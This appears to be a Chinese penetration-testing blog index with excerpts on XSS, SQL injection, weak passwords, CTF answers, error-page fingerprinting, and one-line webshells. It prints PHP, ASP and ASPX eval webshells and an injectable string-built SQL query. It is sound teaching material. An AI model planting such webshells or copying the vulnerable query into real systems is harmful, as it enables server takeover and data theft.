渗透测试
数学家是我理想
博客:https://wmathor.com
展开
-
XSS攻击常识及实战
什么是XSS?XSS全称是Cross Site Scripting(为了和CSS进行区分,就叫XSS)即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了XSS分类XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS反射型XSS发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响...原创 2018-10-31 21:05:13 · 17355 阅读 · 3 评论 -
记一次渗透测试自己的jsp项目
前两天写了个比较简单的login登陆页面,输入username和password,通过输入的username查询数据库中的password和框中的值进行对比验证测试先输入一对值,admin,123456,弹出信息果然,意料之内用户名或密码错误,但是我们从这次测试能看出一点,这个数据传输的方式是post,注入测试先试一下SQL注入还是没用,而且什么信息都没给,估计它本身并不返回任何...原创 2018-10-31 21:05:41 · 1545 阅读 · 0 评论 -
HackingLab的一套渗透测试题
HackinglabHackinglab是一个在线网络信息安全攻防平台,里面有很多题,我随便做里面一套题,算是这两天学渗透的一个总结,题目地址选用360浏览器是因为方便切换代理设置1.key在哪里?过关地址第一题比较水,直接查看网页源代码就能找到key了jflsjklejflkdsjfklds2.再加密一次你就得到key啦~给了加密之后的数据是xrlvf23xfqwsxsqf,...原创 2018-10-31 21:07:08 · 1923 阅读 · 2 评论 -
SQL注入
什么是SQL注入?当客户端提交的数据未做处理或转义,直接带入数据库就造成了SQL注入布尔注入利用返回真假的效果做到SQL注入,比方说有下面一串代码String sql = null;sql = "select * from user where username = " + "'" + un + "'" + "and password = " + "'" + pwd + "'";原创 2018-10-31 21:07:43 · 274 阅读 · 0 评论 -
漏洞:弱口令、爆破
成因弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜测或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如”123”、”abc”等,因为这样的口令很容易被别人破解。通过爆破工具就可以很容易破解用户的弱口令。分类普通型普通型弱口令就是常见的密码,比如,目前网络上也有人特地整理了常用的弱口令(Top 100):123456 a123456 1...原创 2018-11-01 19:32:02 · 17683 阅读 · 0 评论 -
一句话木马与中国菜刀
什么是一句话木马?一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下php:<?php @eval($_post['pass']);?>asp:<%eval request ("pass")%>aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"u原创 2018-10-30 13:04:05 · 11655 阅读 · 3 评论 -
根据网站错误页面判断服务器和系统服务
判断容器随便找一个网站,比方说这个;https://777kuu.com/ ,在网址后面加上不可能存在的东西,比方说:https://777kuu.com/123.jpg ,让他暴露错误信息像这样白底黑字加红字的就是windows 2008 R2 IIS7.5或IIS7.0像这种白底黑字就是windows 2003 IIS6.0还有这种,这个就很好说了,jsp的网站,Tomcat判...原创 2018-10-31 09:02:22 · 621 阅读 · 0 评论